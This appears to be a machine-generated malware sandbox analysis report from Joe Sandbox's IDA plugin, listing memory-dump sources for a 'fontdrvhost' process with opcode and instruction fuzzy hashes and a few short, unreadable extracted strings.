                                                                                                                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5e9cd5ed10895c86a932a75d72643b9f5da2da9c751ea2b5407b6f0cc95d6473
                                                                                                                                                                                              • Instruction ID: 3ceb73b4dd35ad601519a4f76cb6aafe890dfa9db5c4d6e9a3c339b50593d7d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e9cd5ed10895c86a932a75d72643b9f5da2da9c751ea2b5407b6f0cc95d6473
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AE04F6594F7C04FC74B9B3488B88547F60EE1B21078E41EBC085CF1B3DA199849C711
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ff413a3a33e9fbe758018eca7c1dbab9a284825c894f32a494da261e893d4b17
                                                                                                                                                                                              • Instruction ID: 8a5608cc03d82900ad6dd234a198c9f1685f9c0a38ed184c47e643450d133f4f
                                                                                                                                                                                              • Opcode Fuzzy Hash: ff413a3a33e9fbe758018eca7c1dbab9a284825c894f32a494da261e893d4b17
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EE0EC6150A7844FC70A972488699403FB0EE2721178B01C7D445CF5B3E6199D89C752
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
                                                                                                                                                                                              • Instruction ID: 440875f1c3495205946f349d650d2e2f573cb0fb0432b7f4fec91baa1984ef99
                                                                                                                                                                                              • Opcode Fuzzy Hash: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E0E521F2A01E4AFF76A794C8717F966A1AF9C700F1600B4D90E932E2DD286F418A40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e7ef217ff4eb5492b83989716709550b202ca7335e70157406d0969c6ea17a95
                                                                                                                                                                                              • Instruction ID: 36e05b11841ccc0108c04ef1526e9495c6b2bfb95a32280b77367358f88b65e1
                                                                                                                                                                                              • Opcode Fuzzy Hash: e7ef217ff4eb5492b83989716709550b202ca7335e70157406d0969c6ea17a95
                                                                                                                                                                                              • Instruction Fuzzy Hash: B5E0173150A7884FC70AAB649CA99943FB0EF6B21178B01D7D005CB6B3EA1D8D89C752
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
                                                                                                                                                                                              • Instruction ID: 9e91538d33bcf1ff31d1daf3e935f11fa6aad565d4a6797f9193c71a5b089275
                                                                                                                                                                                              • Opcode Fuzzy Hash: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 18D01234B519044FC71CBB3888598747391EB6E2167D540A9E40BC72B1D96ADD89C781
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                                                                                                                                                              • Instruction ID: e3cda102633bb93f13e9d23eecef5d75909da143b8c742f02d37231c5f53ca1b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EC04C06F6B61F41FC3677EE98660ACA9405FDDE10FD70172D54D400F59D4D22D50156
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0eb17bf96a01563e36a4810c3121020d6c96c92632c0073b75138b8da8868e2a
                                                                                                                                                                                              • Instruction ID: 46163ef23df48f766b075f4b8911b4e50c5463132f318969987cd1f80bb83601
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eb17bf96a01563e36a4810c3121020d6c96c92632c0073b75138b8da8868e2a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65D06720E2955A8AEB58AB94D865ABDA6B1FF44304F400175D0299A2DEDF7825014741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
                                                                                                                                                                                              • Instruction ID: a842983edc11aa207099163a2db317fdacf31f9b71b22df78cda08294cf257ce
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DC08C3452180C8FC908EB28C88480437A0FB0E300BC200D0E408C7170D22ADCC1C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
                                                                                                                                                                                              • Instruction ID: b7c12546d953506ea2988d63a4604157626053400403b06695e3cd1b69b8850c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
                                                                                                                                                                                              • Instruction Fuzzy Hash: 96C08C305118088FC904F72CC98480036E0FB0D210BC20190E00EC7174E21A9C90C708
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 62a67527e07ab606bb55a84f40f91a289e84c2e3ab0f43b028bd5ce63b539a7f
                                                                                                                                                                                              • Instruction ID: e550e1f52ac6efe91f66f480f86679393129b10c742f7a4e44bd02aa9424413a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 62a67527e07ab606bb55a84f40f91a289e84c2e3ab0f43b028bd5ce63b539a7f
                                                                                                                                                                                              • Instruction Fuzzy Hash: F1C00205F1881A06E66A665858725AE48929B44605F960174E01AD66CACD1C5E021286
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
                                                                                                                                                                                              • Instruction ID: 0c4e204c538c454e802ae9c919208580580947423b2123857e325c27a960735f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 09C09225E2D05D45EF35A7B0C8263BA76516F69208F5B8AB3806FA6092DD286A415580
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                                                                                                                                                              • Instruction ID: 1d9f8bd6d6adcdb907527511e4359e075298aa56e918e12f664cf8e3d49fc676
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                                                                                                                                                              • Instruction Fuzzy Hash: CDB01200E6740F00EC2433FA089206478405B4C500FC200B0E80D400A5984D22940242
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 97a9ccc05a214523d948bc7d4f65cd7fcb377f74db3e39bb40074f6e3e682ff6
                                                                                                                                                                                              • Instruction ID: 806288d09c858857e980ea50b693c17f4a717ae1b9cb3ed9b7a389c929f2b684
                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a9ccc05a214523d948bc7d4f65cd7fcb377f74db3e39bb40074f6e3e682ff6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FA00248DA780E01D91936FA1E970A474549B8D116FC62661E90880196E88E16E942DB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: >M_^$M_^b$_[>$K=M
                                                                                                                                                                                              • API String ID: 0-990317550
                                                                                                                                                                                              • Opcode ID: cebc097ee451755a7ed9b46e671a7d97ddcc60ff29868cbfcb2ff1ce228ec6c1
                                                                                                                                                                                              • Instruction ID: 9357f7be5acf496bff615035a408f7f6dfdb38eff3d7cbbe57033adacfea1541
                                                                                                                                                                                              • Opcode Fuzzy Hash: cebc097ee451755a7ed9b46e671a7d97ddcc60ff29868cbfcb2ff1ce228ec6c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03517093B0843A84E21E32AD7E5A9FD7704DF8137DB4447B7E16E8A0CB6C5C648361D9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: J_^?$J_^F$J_^M$J_^T
                                                                                                                                                                                              • API String ID: 0-115975086
                                                                                                                                                                                              • Opcode ID: 777123db1a294147c282865d937ba707560efb223ef43eccb97690ddf41da6bf
                                                                                                                                                                                              • Instruction ID: 602fa7cb951474842565e8386975eac24ac4c7eb0f68bdc7fc4025e67a5c7f5a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 777123db1a294147c282865d937ba707560efb223ef43eccb97690ddf41da6bf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E214CB770813789D30E77BCB9558F82385EF8036C70845F7D0AE8B0D79D15284646D4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 5Y_H
                                                                                                                                                                                              • API String ID: 0-3237497481
                                                                                                                                                                                              • Opcode ID: 495fa33f7135a4c2d61ee77c40c01c27ab9b48f1e2cee74dfad0f8ac62783832
                                                                                                                                                                                              • Instruction ID: f9c7f9fc1c838139e96d9734c739045b333c28b014cbb5df142facf08739000f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 495fa33f7135a4c2d61ee77c40c01c27ab9b48f1e2cee74dfad0f8ac62783832
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75910572A29A8E8FE759DB6888797A97FE1FB5A704F4001BAD019D72D6EF781411C300
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d6025f25b102d5cfcd12adf6f390dae0c7853cc60684f64eaa7419ec36f1f78c
                                                                                                                                                                                              • Instruction ID: e3e7477bdc61cd1f21ffb49201b84d8aaa611a934197ca2ac089b54cbcbc620a
                                                                                                                                                                                              • Opcode Fuzzy Hash: d6025f25b102d5cfcd12adf6f390dae0c7853cc60684f64eaa7419ec36f1f78c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4852C130A196498FEB6CCF68C4A86BD77A1FF58300F5145BDD45EC739ACA78A981CB40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4b33dd409583976e2f5e4e530cc182735a79e7df16d2d7e2fc485c27f3774f26
                                                                                                                                                                                              • Instruction ID: 11fe45237c621ca4d2f2eb5b8323a7f8b388be7083dc484ee5b6c7745c42880d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b33dd409583976e2f5e4e530cc182735a79e7df16d2d7e2fc485c27f3774f26
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C51E172A2994E8AE79CDB5C88697B9BFE0EB8A714F4002BED019D32D5DB7914118300
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: c9$!k9$"s9
                                                                                                                                                                                              • API String ID: 0-3426396564
                                                                                                                                                                                              • Opcode ID: 8060530394fdff4f960ee9cc255e7e246673dd1eb14ffbc4972a1e0e5936e8ec
                                                                                                                                                                                              • Instruction ID: 2ac9d3d5b37b9d89e05c4565c11d28c5889de7f93a377dedb0eecd4f0ca177d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8060530394fdff4f960ee9cc255e7e246673dd1eb14ffbc4972a1e0e5936e8ec
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF0F43772A91E8BC7006B7EB8905E9B780EB9A236BD503BBD504C7291E611181A87D0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                                                              • Opcode ID: 740fa53be062aa196013775336c201f0a8017801838aff035c9cbcab79028f5f
                                                                                                                                                                                              • Instruction ID: c57462273a8d22560bfc530211fe41ff4d23de2574aa3be6188e53b870e28462
                                                                                                                                                                                              • Opcode Fuzzy Hash: 740fa53be062aa196013775336c201f0a8017801838aff035c9cbcab79028f5f
                                                                                                                                                                                              • Instruction Fuzzy Hash: C6516D31E1964E8FEB59DBA8C4655BDBBB1EF84300F1141BAD01EE729ACB346A01CB40
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                                                              • Opcode ID: 68571c0a59f83f61ceaa41f0b0e995183a5c425050f154a3ef9e95ad400106e7
                                                                                                                                                                                              • Instruction ID: caa910a9a458e329b50a1cbe90acfd268a97711e5e5764a317b277b7d53cafe9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 68571c0a59f83f61ceaa41f0b0e995183a5c425050f154a3ef9e95ad400106e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56514C31E0964E9FEB68DBA8C4695FDB7B1FF55300F5140B9C01AE73A6CA746A01CB41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8b82be4ac1d17682dbea21566ff7de6b20fd0e038e2f36120974c62cbe100be2
                                                                                                                                                                                              • Instruction ID: b12cc52168d1a877712249467de5c93e60bb36419ca42666d33a656d0a9ec9c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b82be4ac1d17682dbea21566ff7de6b20fd0e038e2f36120974c62cbe100be2
                                                                                                                                                                                              • Instruction Fuzzy Hash: CC21D456F0F19FA6F63966F828374FC1A50AF51720F5B01B7D05F860EADC0C2A455392
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 99e2fcfacbf43ab9b450b9f06af09179d0b6f08a55cf66e66ed51f2b764da6bc
                                                                                                                                                                                              • Instruction ID: 66c7f996fb505d9a8155286b3684473c901b2f86122bbfc57030b8ac07c38c1e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 99e2fcfacbf43ab9b450b9f06af09179d0b6f08a55cf66e66ed51f2b764da6bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9F1D33061955A9FEB68CF68C4E15B83BA1FF45300B5541BDC84ECB69FCA38E982CB41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f257e6535bfd1e0471a33854d2a054d74325cbebe47989ce8c108ea8eec9d94a
                                                                                                                                                                                              • Instruction ID: 656bb5de47b60a4e2c8e2f2b609bc9c312c85e72166d467699a966a57cc41c53
                                                                                                                                                                                              • Opcode Fuzzy Hash: f257e6535bfd1e0471a33854d2a054d74325cbebe47989ce8c108ea8eec9d94a
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9D10634B0EA0E8FE378DB64D4A557977E1FF44300B15457EE48EC36AADE28B9428741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d86efd08d848230fe5ad8f1a94079580d0b64dd7233f9e629db5b87ddfed6806
                                                                                                                                                                                              • Instruction ID: 1d31a9a1e33f4da50719e2123814723a5637b6bac7d0007d81e56274cd1253a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: d86efd08d848230fe5ad8f1a94079580d0b64dd7233f9e629db5b87ddfed6806
                                                                                                                                                                                              • Instruction Fuzzy Hash: 25D1F130B0EB4A8FE378DB78D4A157977E1FF44300B25457EC48EC76AADA29B9428741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
